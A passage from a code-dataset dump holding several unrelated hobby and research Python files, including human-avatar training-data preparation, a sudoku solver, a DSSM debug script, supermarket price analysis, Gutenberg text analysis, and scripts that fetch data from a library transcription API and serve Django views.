0, n_files = -1):\n assert prefix in ['_male', '_female']\n os.makedirs(out_dir, exist_ok=True)\n\n ex_val = np.array([1.0]) if prefix == '_male' else np.array([0.0])\n\n paths = sorted([path for path in Path(in_dir).glob('*.*')])\n if n_files > 0:\n paths = paths[:n_files]\n\n for path in tqdm(paths, desc=f'copy_target_prefix {prefix}'):\n param = np.load(path)\n param = np.hstack([ex_val, param])\n if pose_duplicate == 0:\n np.save(os.path.join(*[out_dir, f'{prefix}_{path.name}']), param)\n else:\n for i in range(pose_duplicate):\n np.save(os.path.join(*[out_dir, f'{prefix}_{path.stem}_pose{i}{path.suffix}']), param)\n\ndef remove_missing_pair(sil_f_dir, sil_s_dir):\n sil_f_names = set([path.name for path in Path(sil_f_dir).glob('*.*')])\n sil_s_names = set([path.name for path in Path(sil_s_dir).glob('*.*')])\n\n common_names = sil_f_names.intersection(sil_s_names)\n\n bad_f_names = sil_f_names.difference(common_names)\n bad_s_names = sil_s_names.difference(common_names)\n\n for name in bad_f_names:\n print(f'remove file {name}')\n path = os.path.join(*[sil_f_dir, name])\n os.remove(path)\n\n for name in bad_s_names:\n print(f'remove file {name}')\n path = os.path.join(*[sil_s_dir, name])\n os.remove(path)\n\ndef verify_missing_pair(sil_f_dir, sil_s_dir):\n sil_f_names = [path.name for path in Path(sil_f_dir).glob('*.*')]\n sil_s_names = [path.name for path in Path(sil_s_dir).glob('*.*')]\n sil_f_names = sorted(sil_f_names)\n sil_s_names = sorted(sil_s_names)\n\n for f_name, s_name in zip(sil_f_names, sil_s_names):\n assert f_name == s_name, 'missing pair'\n\ndef dump_heights(pca_in_dir, pca_ml_model_path, pca_fml_model_path, height_out_path, n_files = -1):\n ml_model = joblib.load(pca_ml_model_path)\n fml_model = joblib.load(pca_fml_model_path)\n\n paths = sorted([path for path in Path(pca_in_dir).glob('*.*')])\n if n_files > 0:\n paths = paths[:n_files]\n\n heights = []\n for path in tqdm(paths, desc='dump height'):\n param = np.load(path)\n if '_male' in path.stem:\n assert param[0] >= 0.9, f'{param[0]} >= 0.9, {path.name}'\n verts = ml_model.inverse_transform(param[1:])\n else:\n assert param[0] <= 0.1, f'{param[0]} <= 0.1, {path.name}'\n verts = fml_model.inverse_transform(param[1:])\n\n verts = verts.reshape(verts.shape[0] // 3, 3)\n h = verts[:, 2].max() - verts[:, 2].min()\n heights.append((path.stem, h))\n\n with open(height_out_path, 'wt') as file:\n file.writelines(f\"{l[0]} {l[1]}\\n\" for l in heights)\n\n\ndef verify_splitting_pose_variant(paths, train_idxs, valid_idxs, test_idxs, N_pose_per_subject):\n \"\"\"\n verify that all pose variants of a subject stay completely inside each set\n :param paths:\n :param train_idxs:\n :param valid_idxs:\n :param test_idxs:\n :param N_pose_per_subject:\n \"\"\"\n train_paths = [paths[idx] for idx in train_idxs]\n valid_paths = [paths[idx] for idx in valid_idxs]\n test_paths = [paths[idx] for idx in test_idxs]\n verify_pose_variants_per_name(train_paths, N_pose_per_subject)\n verify_pose_variants_per_name(valid_paths, N_pose_per_subject)\n verify_pose_variants_per_name(test_paths, N_pose_per_subject)\n\ndef split_train_valid_test_pose_variants(sil_f_paths, sil_s_paths):\n assert len(sil_f_paths) == len(sil_s_paths)\n for path_f, path_s in zip(sil_f_paths, sil_s_paths):\n assert Path(path_f).name == Path(path_s).name\n\n # find unique mesh. ignore pose variants\n unique_names = set()\n for path in sil_f_paths:\n org_name = remove_pose_variant_in_file_name(path.stem)\n unique_names.add(org_name)\n\n unique_names = [name for name in unique_names]\n N_uniq = len(unique_names)\n\n # split the subject unique names into train, valid, test sets\n #np.random.seed(100)\n label = np.zeros(N_uniq, dtype=np.uint8)\n for idx, name in enumerate(unique_names):\n label[idx] = 1 if '_male' in name else 0\n org_train_idxs, org_test_idxs = train_test_split(np.arange(N_uniq), test_size=0.1, stratify=label) # big test size for reduced traning time\n\n label = np.zeros(len(org_train_idxs), dtype=np.uint8)\n for i in range(len(org_train_idxs)):\n label[i] = 1 if '_male' in unique_names[org_train_idxs[i]] else 0\n org_train_idxs, org_valid_idxs = train_test_split(org_train_idxs, test_size=0.10, stratify=label)\n\n # classify subject/human names into train, valid, test\n name_classes = {}\n for idx in org_train_idxs:\n name_classes[unique_names[idx]] = 'train'\n for idx in org_valid_idxs:\n name_classes[unique_names[idx]] = 'valid'\n for idx in org_test_idxs:\n name_classes[unique_names[idx]] = 'test'\n\n # now we classify all pose variant paths in to train, valid, test sets\n # based on the corresponding subject/human name\n train_idxs = []\n valid_idxs = []\n test_idxs = []\n for idx, path in enumerate(sil_f_paths):\n org_name = remove_pose_variant_in_file_name(path.stem)\n class_id = name_classes[org_name]\n if class_id == 'train':\n train_idxs.append(idx)\n elif class_id == 'valid':\n valid_idxs.append(idx)\n elif class_id == 'test':\n test_idxs.append(idx)\n else:\n assert 'opp. something wrong. unexpected name format'\n\n return np.array(train_idxs), np.array(valid_idxs), np.array(test_idxs)\n\ndef split_train_valid_test(sil_f_paths, sil_s_paths):\n assert len(sil_f_paths) == len(sil_s_paths)\n for path_f, path_s in zip(sil_f_paths, sil_s_paths):\n assert Path(path_f).name == Path(path_s).name\n\n n = len(sil_f_paths_dict)\n n_females = len([name for name in sil_f_paths if '_female' in name])\n n_males = len([name for name in sil_f_paths if '_male' in name])\n print(f'n females = {n_females}, n_males = {n_males}')\n\n np.random.seed(100)\n label = np.zeros(len(sil_f_paths), dtype=np.uint8)\n for idx, path in enumerate(sil_f_paths):\n label[idx] = 1 if '_male' in path.stem else 0\n train_idxs, test_idxs = train_test_split(np.arange(n), test_size=0.1, stratify=label) # big test size for reduced traning time\n\n label = np.zeros(len(train_idxs), dtype=np.uint8)\n for i in range(len(train_idxs)):\n label[i] = 1 if '_male' in sil_f_paths[train_idxs[i]].stem else 0\n train_idxs, valid_idxs = train_test_split(train_idxs, test_size=0.10, stratify=label)\n\n return train_idxs, valid_idxs, test_idxs\n\ndef check_input_visually(sil_f_ml_dir, sil_s_ml_dir, sil_f_fml_dir, sil_s_fml_dir):\n import matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-sil_dir\", default=True, required=True)\n ap.add_argument(\"-target_ml_dir\", default=True, required=False)\n ap.add_argument(\"-target_fml_dir\", default=True, required=False)\n ap.add_argument(\"-pca_ml_model_path\", default=True, required=False)\n ap.add_argument(\"-pca_fml_model_path\", default=True, required=False)\n ap.add_argument(\"-vic_mesh_path\", required=True, help=\"path to victoria template mesh to store in the output directory\")\n ap.add_argument(\"-out_dir\", default=False, required=False)\n ap.add_argument(\"-resize_size\", type=str, default='360x360', required=False)\n ap.add_argument(\"-post_process\", action='store_true')\n ap.add_argument(\"-c\", \"--is_color\", action='store_true',help=\"color body part parsing or binary silhouette?\")\n ap.add_argument(\"-p\", \"--n_pose_variant\", type=int, default=0 ,help=\"are there pose variants in the input images?: name0_pose0, name0_pose1, name0_pose30,..\")\n args = ap.parse_args()\n\n size = args.resize_size.split('x')\n size = (int(size[0]), int(size[1]))\n\n sil_f_ml_dir = f'{args.sil_dir}/male/sil_f_raw/'\n sil_s_ml_dir = f'{args.sil_dir}/male/sil_s_raw/'\n sil_f_fml_dir = f'{args.sil_dir}/female/sil_f_raw/'\n sil_s_fml_dir = f'{args.sil_dir}/female/sil_s_raw/'\n assert Path(sil_f_ml_dir).exists(), f'{sil_f_ml_dir} does not exist'\n assert Path(sil_s_ml_dir).exists(), f'{sil_s_ml_dir} does not exist'\n assert Path(sil_f_fml_dir).exists(), f'{sil_f_fml_dir} does not exist'\n assert Path(sil_s_fml_dir).exists(), f'{sil_s_fml_dir} does not exist'\n\n os.makedirs(args.out_dir, exist_ok=True)\n\n # path = '/home/khanhhh/data_1/projects/Oh/data/3d_human/caesar_obj/blender_images/realistic_projections/female/front/CSR0017A.png'\n # segment_body_part_sil_f(path)\n # exit()\n\n #save pca model\n model_female = joblib.load(filename=args.pca_fml_model_path)\n model_male = joblib.load(filename=args.pca_ml_model_path)\n pca_model = PcaModel(model_female=model_female, model_male=model_male)\n out_path = os.path.join(*[args.out_dir, 'pca_model.jlb'])\n pca_model.dump(out_path)\n\n print(f'dump pca model to {out_path}')\n\n #n_file = 30*10 #for debugging with small number of files\n n_file = -1\n # copy pca target with the same name pattern to the out dir\n out_target_dir = os.path.join(*[args.out_dir, 'target'])\n copy_target_prefix(args.target_fml_dir, out_target_dir, '_female', args.n_pose_variant, n_files=n_file)\n copy_target_prefix(args.target_ml_dir, out_target_dir, '_male', args.n_pose_variant, n_files=n_file)\n\n out_height_path = os.path.join(*[args.out_dir, 'height.txt'])\n dump_heights(pca_in_dir=out_target_dir,\n pca_ml_model_path=args.pca_ml_model_path, pca_fml_model_path=args.pca_fml_model_path,\n height_out_path=out_height_path)\n\n #exit()\n vic_mesh_path = Path(args.vic_mesh_path)\n shutil.copy(str(vic_mesh_path), os.path.join(*[args.out_dir, \"vic_template_mesh.obj\"]))\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(f'created temporary dir: {tmp_dir}')\n\n tmp_sil_f_dir = os.path.join(*[tmp_dir, 'sil_f'])\n tmp_sil_s_dir = os.path.join(*[tmp_dir, 'sil_s'])\n\n # merge both male and female to a tempt dir and make their file names distinctive\n copy_file_prefix(sil_f_ml_dir, tmp_sil_f_dir, '_male', n_file=n_file)\n copy_file_prefix(sil_s_ml_dir, tmp_sil_s_dir, '_male',n_file=n_file)\n\n copy_file_prefix(sil_f_fml_dir, tmp_sil_f_dir, '_female',n_file=n_file)\n copy_file_prefix(sil_s_fml_dir, tmp_sil_s_dir, '_female',n_file=n_file)\n\n #remove_missing_pair(tmp_sil_f_dir, tmp_sil_s_dir)\n #make sure that there is a complete pari: front-side for every images\n verify_missing_pair(tmp_sil_f_dir, tmp_sil_s_dir)\n\n sil_f_paths_dict = dict([(path.stem, path) for path in Path(tmp_sil_f_dir).glob('*.*')])\n sil_s_paths_dict = dict([(path.stem, path) for path in Path(tmp_sil_s_dir).glob('*.*')])\n assert sil_f_paths_dict.keys() == sil_s_paths_dict.keys()\n\n sil_f_paths = [path for path in sil_f_paths_dict.values()]\n sil_s_paths = [path for path in sil_s_paths_dict.values()]\n\n name_ids = [id for id in sil_s_paths_dict.keys()]\n\n out_sil_f_dir = join(*[args.out_dir, 'sil_f'])\n out_sil_s_dir = join(*[args.out_dir, 'sil_s'])\n os.makedirs(out_sil_f_dir, exist_ok=True)\n\n os.makedirs(out_sil_s_dir, exist_ok=True)\n\n if args.n_pose_variant == 0:\n train_idxs, valid_idxs, test_idxs = split_train_valid_test(sil_f_paths, sil_s_paths)\n else:\n #if there are N_pose_variants per subject, we need to split in a way that all pose variant images of a subject\n #stay completely inside a set. There must be no cases like: subject0_pose_0 is in the train set but subject0_pose_25 is in the test set\n train_idxs, valid_idxs, test_idxs = split_train_valid_test_pose_variants(sil_f_paths, sil_s_paths)\n\n #verify if our splitting is correct\n verify_splitting_pose_variant(sil_f_paths, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, N_pose_per_subject=args.n_pose_variant)\n verify_splitting_pose_variant(sil_s_paths, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, N_pose_per_subject=args.n_pose_variant)\n\n copy_train_valid_test(name_ids, sil_f_paths_dict, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, out_dir=out_sil_f_dir, args=args)\n copy_train_valid_test(name_ids, sil_s_paths_dict, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, out_dir=out_sil_s_dir, args=args)\n\n print(f'deleted temporary dir')\n\n #if not args.color:\n crop_train_test_valid(out_sil_f_dir, out_sil_s_dir, size, args.is_color)\n\n","repo_name":"khanhha/human_avatar_reconstruction","sub_path":"src/pca/tool_prepare_train_data_ml_fml.py","file_name":"tool_prepare_train_data_ml_fml.py","file_ext":"py","file_size_in_byte":20192,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"4827286708","text":"import math\n\n\ndef is_safe_to_place(board, r, c, num):\n # check for column\n for i in range(len(board[0])):\n if board[r][i] == num:\n return False\n # check for row\n for i in range(len(board)):\n if board[i][c] == num:\n return False\n # check for sub_board\n sqrt_num = int(math.sqrt(len(board)))\n k = r - r % sqrt_num\n e = c - c % sqrt_num\n\n for i in range(k, k + sqrt_num):\n for j in range(e, e + sqrt_num):\n if board[i][j] == num:\n return False\n return True\n\n\ndef solve_sudoko_1(board, r, c):\n if r == len(board):\n return True\n\n if c == len(board[0]):\n solve_sudoko_1(board, r + 1, 0)\n return False\n\n if board[r][c] != \".\":\n solve_sudoko_1(board, r, c+1)\n return False\n\n for i in range(1, len(board[0]) + 1):\n if is_safe_to_place(board, r, c, str(i)):\n board[r][c] = str(i)\n if (solve_sudoko_1(board, r, c+1)):\n return True\n else:\n board[r][c] = \".\"\n return False\n\n\ndef solve_sudoko(board):\n\n flag = True\n row = - 1\n col = -1\n # To replace r, c in arguments\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == \".\":\n row = i\n col = j\n flag = False\n break\n if not flag:\n break\n if flag:\n for row in board:\n print(row)\n return True\n # sudoko is solved\n\n for i in range(1, len(board[0])+1):\n if is_safe_to_place(board, row, col, str(i)):\n board[row][col] = str(i)\n if solve_sudoko(board):\n return True\n board[row][col] = \".\"\n return False\n\n\n\n\n\n\nif __name__ == \"__main__\":\n board = [[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"], [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"], [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"], [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"], [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\n print(solve_sudoko(board))\n","repo_name":"mukunda1518/Data-Structures-Algorithms","sub_path":"recursions/backtracking/suduko.py","file_name":"suduko.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24075858781","text":"#coding:utf8\nimport sys\nimport os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom dssm import DSSM\n\ndef fake_train_data():\n query = np.random.randint(5, size=[100, 2]) \n doc = np.random.randint(5, size=[100, 2]) \n Y = np.random.randint(2, size=[100, 1])\n Y = Y.astype(float)\n return query, doc, Y\n\ndef debug():\n query, doc, Y = fake_train_data()\n dssm = DSSM()\n with tf.Session() as sess:\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n for i in range(len(Y)):\n q = query[i:i+1]\n d = doc[i:i+1]\n label = Y[i:i+1]\n print('query:', sess.run(dssm.query, feed_dict={dssm.query : q}))\n print('doc:', sess.run(dssm.doc, feed_dict={dssm.doc : d}))\n print('label:', sess.run(dssm.label, feed_dict={dssm.label : label}))\n\n # embedding table\n print('embedding:', sess.run(dssm.embedding))\n\n # debug query\n print('query_embedding:', sess.run(dssm.query_embeddings, feed_dict={dssm.query : q}))\n print('query_flatten:', sess.run(dssm.query_flatten, feed_dict={dssm.query: q}))\n \n # debug doc\n print('doc_embedding:', sess.run(dssm.doc, feed_dict={dssm.doc : d}))\n print('doc_flatten:', sess.run(dssm.doc_flatten, feed_dict={dssm.doc : d}))\n\n # debug dense layer\n print('query_layer_1_out:', sess.run(dssm.query_layer_1_out, feed_dict={dssm.query : q}))\n print('doc_layer_1_out:', sess.run(dssm.doc_layer_1_out, feed_dict={dssm.doc : d}))\n \n # debug cosine_similarity, score, loss\n print('cosine_similarity:', sess.run(dssm.cosine_similarity, feed_dict={dssm.query : q, dssm.doc : d}))\n print('score:', sess.run(dssm.score, feed_dict={dssm.query : q, dssm.doc : d}))\n print('loss:', sess.run(dssm.loss, feed_dict={dssm.query : q, dssm.doc : d, dssm.label : label}))\n\n\nif __name__ == '__main__':\n debug()\n sys.exit(0)\n","repo_name":"ustcqi/tftoys","sub_path":"sparse_dnn/dssm/high_order_api/dssm_test.py","file_name":"dssm_test.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33563811428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nfrom __future__ import print_function\nimport add_to_path\nfrom add_to_path import path_data\nfrom functions_generic_qlmc import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\npath_built = os.path.join(path_data,\n 'data_supermarkets',\n 'data_built',\n 'data_qlmc_2007_12')\n\npath_built_csv = os.path.join(path_built, 'data_csv')\n\n# ###########\n# LOAD DATA\n#############\n\ndateparse = lambda x: pd.datetime.strptime(x, '%d/%m/%Y')\ndf_qlmc = pd.read_csv(os.path.join(path_built_csv,\n 'df_qlmc.csv'),\n parse_dates = ['date'],\n date_parser = dateparse,\n encoding = 'utf-8')\n\n# Fix Store_Chain for prelim stats des\nls_sc_drop = ['CARREFOUR CITY',\n 'CARREFOUR CONTACT',\n 'CARREFOUR PLANET',\n 'GEANT DISCOUNT',\n 'HYPER CHAMPION',\n 'INTERMARCHE HYPER',\n 'LECLERC EXPRESS',\n 'MARCHE U',\n 'U EXPRESS']\n\ndf_qlmc = df_qlmc[~df_qlmc['store_chain'].isin(ls_sc_drop)]\n\nls_sc_replace = [('CENTRE E. LECLERC', 'LECLERC'),\n ('CENTRE LECLERC', 'LECLERC'),\n ('E. LECLERC', 'LECLERC'),\n ('E.LECLERC', 'LECLERC'),\n ('SYSTEME U', 'SUPER U'),\n ('GEANT', 'GEANT CASINO')]\nfor sc_old, sc_new in ls_sc_replace:\n df_qlmc.loc[df_qlmc['store_chain'] == sc_old,\n 'store_chain'] = sc_new\n\n# restrict to period 2 here...\ndf_prices = df_qlmc[df_qlmc['period'] == 2]\ndf_prices = df_prices[~df_prices['id_lsa'].isnull()]\n\n# ###############\n# FORMAT ANALYSIS\n# ###############\n\nls_prod_pairs = [[u'Ricard - Ricard pastis 45 degrés - 50cl',\n u'Ricard - Ricard pastis 45 degrés - 70cl'],\n [u'Ricard - Ricard pastis 45 degrés - 70cl',\n u'Ricard - Ricard pastis 45 degrés - 1L'],\n [u'Ricard - Ricard pastis 45 degrés - 1L',\n u'Ricard - Ricard pastis 45 degrés - 1.5L'],\n [u'Coca Cola - Coca Cola avec caféine - 1.5L',\n u'Coca Cola - Coca Cola avec caféine - 2L'],\n [u'Panzani - Spagheto Sauce pleine saveur bolognaise - 210g',\n u'Panzani - Spagheto Sauce pleine saveur bolognaise - 425g'],\n [u'Panzani - Spagheto Sauce pleine saveur bolognaise - 425g',\n u'Panzani - Spagheto Sauce pleine saveur bolognaise - 600g']]\n \nfor prod_1, prod_2 in ls_prod_pairs:\n print()\n print(prod_1)\n print(prod_2)\n df_prod_1 = df_prices[['id_lsa', 'price']][df_prices['product'] == prod_1]\n df_prod_2 = df_prices[['id_lsa', 'price']][df_prices['product'] == prod_2]\n df_prod_1.set_index('id_lsa', inplace = True)\n df_prod_2.set_index('id_lsa', inplace = True)\n df_prod_f = df_prod_1.join(df_prod_2, how = 'inner', lsuffix='_1', rsuffix='_2')\n # outer may allow to see manipulation or small stores with less inventory\n df_prod_f['spread'] = df_prod_f['price_2'] - df_prod_f['price_1']\n \n df_prod_f = df_prod_f[df_prod_f['spread'] <\\\n df_prod_f['spread'].mean() + 1*df_prod_f['spread'].std()]\n df_prod_f = df_prod_f[df_prod_f['spread'] >\\\n df_prod_f['spread'].mean() - 1*df_prod_f['spread'].std()]\n \n #plt.scatter(df_prod_f['price_1'], df_prod_f['spread'])\n #plt.show()\n #\n #plt.scatter(df_prod_f['price_2'], df_prod_f['spread'])\n #plt.show()\n \n # spread not so easy to interpret, just focus on that for now:\n ax = plt.subplot()\n ax.scatter(df_prod_f['price_1'], df_prod_f['price_2'])\n ax.set_xlabel('price %s' %prod_1)\n ax.set_ylabel('price %s' %prod_2)\n plt.show()\n\n ## caution: get rid of outliers (how to automate?)\n #df_prod_f = df_prod_f[(df_prod_f['spread'] < 10) & (df_prod_f['spread'] > 5)]\n print(smf.ols('spread ~ price_1', data = df_prod_f).fit().summary())\n print(smf.ols('spread ~ price_2', data = df_prod_f).fit().summary())\n","repo_name":"etiennecha/master_code","sub_path":"code_supermarkets_france/analysis/analysis_qlmc_prices_2007_2012/stats_des/price_vs_product_format.py","file_name":"price_vs_product_format.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8629181985","text":"from collections import defaultdict\nimport re\n\nclass TextAnalysis():\n def __init__(self, filepath):\n with open('./1000mostcommonwords.txt') as reader:\n common_words_text = reader.read()\n self.common_words = common_words_text.split()\n \n # process text from book, line by line\n regex = re.compile('[\"$%*+-/:;<=>@^_,\\.!?()]')\n self.words = []\n # store each chapter using the index of the chapter line\n self.chapters = []\n with open(filepath, 'r') as reader:\n self.lines = reader.readlines()\n for i in range(len(self.lines)):\n line = self.lines[i]\n # gutenberg books surround headings with 2 newlines on either side\n if i - 1 >= 0 and i + 1 < len(self.lines) and self.lines[i+1] == \"\\n\" and self.lines[i-1] == \"\\n\":\n if i - 2 >= 0 and i + 2 < len(self.lines) and self.lines[i+2] == \"\\n\" and self.lines[i-2] == \"\\n\":\n self.chapters.append(i)\n #print(line)\n words_unfiltered = line.split()\n for word in words_unfiltered:\n # remove punctuation from word \n word = regex.sub(\"\", word)\n # remove whitespaces\n word = word.strip()\n self.words.append(word)\n #print(self.chapters)\n self.word_count = defaultdict(int)\n for word in self.words:\n self.word_count[word if word == \"I\" else word.lower()] += 1\n self.word_count = list(self.word_count.items())\n\n def getTotalNumberOfWords(self):\n # return the number of words in the file.\n return len(self.words)\n\n def getTotalUniqueWords(self):\n # returns the number of UNIQUE words in the novel\n unique_words = set()\n for word in self.words:\n if word.lower() not in unique_words:\n unique_words.add(word.lower())\n return unique_words\n \n def get20MostFrequentWords(self):\n # return the 20 most frequently used words\n # in the novel and the number of times they were used\n return sorted(self.word_count, key=lambda wc: (-wc[1], wc[0]))[:20]\n\n def get20MostInterestingFrequentWords(self, limit = 100):\n # filters the most common 100 English words and \n # returns the 20 most frequently used words \n # and the number of times they were used\n common_set = set(self.common_words[:limit])\n most_interesting = list(filter(lambda x: x[0] not in common_set, self.word_count))\n most_interesting.sort(key=lambda wc: (-wc[1], wc[0]))\n return most_interesting[:20] \n \n def get20LeastFrequentWords(self):\n # returns the 20 LEAST frequently used words \n # and the number of times they were used\n return sorted(self.word_count, key=lambda x: (x[1], x[0]))[:20]\n\n def getFrequencyOfWord(self, word):\n #return an array of the number of the times the word was used in each chapter\n chapter_idx = 0\n chapter_frequency = defaultdict(int)\n for index in range(len(self.lines)):\n line = self.lines[index]\n # parse each line of current chapter \n for word_text in line.split():\n if word_text.lower() == word.lower():\n chapter_frequency[chapter_idx] += 1 \n if chapter_idx < len(self.chapters) and index == self.chapters[chapter_idx]:\n # we have reached the start of a new chapter\n chapter_idx += 1 \n print(len(self.chapters))\n for chapter in self.chapters:\n if self.lines[chapter].istitle():\n print(self.lines[chapter])\n #print([self.lines[i] for i in self.chapters])\n return list(chapter_frequency.values())\n\n \n\n\n \n","repo_name":"taanguyen/ProjectGutenberg","sub_path":"TextAnalysis.py","file_name":"TextAnalysis.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29964618396","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\nfrom .models import pollution_index\nfrom .graph import plot, regression\nfrom django.db.models import Max\nimport datetime\n\ndef gen_graph(request):\n cities = ['Delhi','Bangalore','Mumbai','Las-Vegas','New-York']\n delhi = pollution_index.objects.filter(city = cities[0]).order_by('date')\n graph = plot(request,delhi)\n delhi = delhi.all().aggregate(Max('date'))\n\n fields = []\n dates = []\n for i in range(2,20):\n date = delhi['date__max']+ datetime.timedelta(days=i)\n fields.append([regression(pollution_index.objects.filter(city = cities[0]),str(date) ),date])\n\n\n args = {\n 'plot':graph,\n 'fields':fields,\n }\n return render(request,'index.html',args)\n","repo_name":"Smoky-Future/Smoky-Future","sub_path":"pollution-project/levels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34141887110","text":"#!/bin/python\n\nimport urllib.request\nimport json, os.path, time, math, re, operator\n\n\ncounter = 0\n# current time, used for checking the age of the data files\ncurrTime = int(time.time())\n\n# iterators, for purposes\ncontent = []\n# various variables\n# if the all items file is older than 1 day, get master items file from omeka\nitemsFile = './items.json'\nitemsFileModTime = os.path.getmtime(itemsFile)\nif not os.path.exists( itemsFile) or currTime - itemsFileModTime > 86400:\n urllib.request.urlretrieve('http://publications.newberry.org/transcription/mms-transcribe/api/items/', itemsFile)\n# go through all items in items.json and\n# 1. get file___.json and item___.json (if they are older than 1 day)\n# (we don't bother checking age of both files, if files___.json is older than a day, we get them both - low impact inefficiency (aka who cares))\nwith open(itemsFile) as json_file:\n items = json.load(json_file)\n downloadedFileCount = 0\n skippedFileCount = 0\n for i in items:\n id = str(i['id'])\n itemObj = {\n 'id': id,\n 'count': 0,\n 'lang': '',\n 'desc': '',\n 'cataloglink': '',\n 'image': '',\n 'transcount': 0,\n 'percentTranscribed': 0,\n 'date': '',\n 'category': '',\n 'pages': [],\n }\n itemObj['count'] = i['files']['count']\n filesurl = 'http://publications.newberry.org/transcription/mms-transcribe/api/files?item=' + id\n filesfilename = 'dataFiles/files' + id + '.json'\n itemurl = 'http://publications.newberry.org/transcription/mms-transcribe/api/items/' + id\n itemfilename = 'dataFiles/item' + id + '.json'\n if os.path.exists(filesfilename):\n fileModTime = os.path.getmtime(filesfilename)\n if currTime - fileModTime > 86400:\n downloadedFileCount += 1\n urllib.request.urlretrieve(filesurl, filesfilename)\n urllib.request.urlretrieve(itemurl, itemfilename)\n else:\n skippedFileCount += 1\n # 2. create array of subjects with each corresponding id as a value\n for e in i['element_texts']:\n if e['element']['name'] == 'Subject':\n itemObj['category'] = e['text']\n # 3. iterate over files files and get completed status, then add transcripts to content.items.id, concatentated for ease of search\n with open(itemfilename) as item:\n itemJson = json.load(item)\n for ie in itemJson['element_texts']:\n lang = ''\n desc = ''\n image = ''\n weight = ''\n itemObj['id'] = id\n if ie['element']['name'] == 'Language':\n itemObj['lang'] = ie['text']\n if ie['element']['name'] == 'Relation': itemObj['desc'] = ie['text']\n if ie['element']['name'] == 'Description':\n pattern = \"(?P<url>https?://[^\\s]+)\\\" target=\\\"_blank\\\" rel=\\\"noreferrer\\\">View catalog record<\"\n if re.search(pattern, ie['text']) is not None:\n substring = re.search(pattern, ie['text']).group(\"url\").replace('&','&')\n itemObj['cataloglink'] = substring\n if ie['element']['name'] == 'Source':\n itemObj['image'] = ie['text']\n if ie['element']['name'] == 'Title':\n title = ie['text']\n itemObj['title'] = title\n date = re.findall(r'[0-9]{4}', title)\n for i in range(0, len(date)):\n date[i] = int(date[i])\n itemObj['date'] = date\n if lang == '': lang = ['English']\n with open(filesfilename) as files:\n filesJson = json.load(files)\n\n for fi in filesJson:\n counter = counter + 1\n fileObj = {\n 'pageid': fi['id'],\n 'pagefilename': fi['filename'],\n 'transcription': '',\n 'itemid': id,\n 'category': itemObj['category'],\n 'date': itemObj['date'],\n 'lang': itemObj['lang']\n }\n transcription = ''\n for fe in fi['element_texts']:\n if fe['element']['name'] == 'Transcription':\n fileObj['transcription'] = fe['text']\n newFileName = './pages/' + str(fi['id']) + '.json'\n content.append(fileObj)\n with open (newFileName, 'w') as recordFile:\n json.dump(fileObj, recordFile)\n if counter % 500 == 0:\n with open ('./clumps/' + str(counter) + '.json', 'w') as clumpFile:\n json.dump(content, clumpFile)\n content = []\n print(itemObj['id'])\n# with open ('./pages.json', 'w') as recordFile:\n# json.dump(content, recordFile)\nprint('done')\n","repo_name":"NewberryDIS/transcribe","sub_path":"python/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43469448600","text":"from django.shortcuts import render\n\nfrom web.formularios.formularioPlatos import FormularioRegistroPlatos\nfrom web.formularios.formularioEmpleados import FormularioRegistroEmpleados\nfrom web.models import Platos, Empleados\n\n# Create your views here.\n#Cada vista es una funcion de python \n\ndef Home(request):\n return render(request, 'index.html')\n\ndef PlatosVista(request):\n #cargar el formulario de registros de platos \n formulario = FormularioRegistroPlatos()\n\n #creamos un diccionario para enviar datos hacia al template \n diccionarioEnvioDatos ={\n 'formulario':formulario\n }\n\n #RECIBIENDO DATOS DEL FORMULARIO \n #PETICION POST \n if request.method == 'POST':\n datosFormulario = FormularioRegistroPlatos(request.POST)\n \n if datosFormulario.is_valid():\n datosLimpios = datosFormulario.cleaned_data\n #Enviando datos a la DB\n platoNuevo=Platos(\n nombre= datosLimpios[\"nombrePlato\"], \n descripcion=datosLimpios[\"descripcionPlato\"], \n imagen=datosLimpios[\"fotoPlato\"], \n precio=datosLimpios[\"precioPlato\"],\n categoria=datosLimpios[\"tipoPlato\"]\n )\n 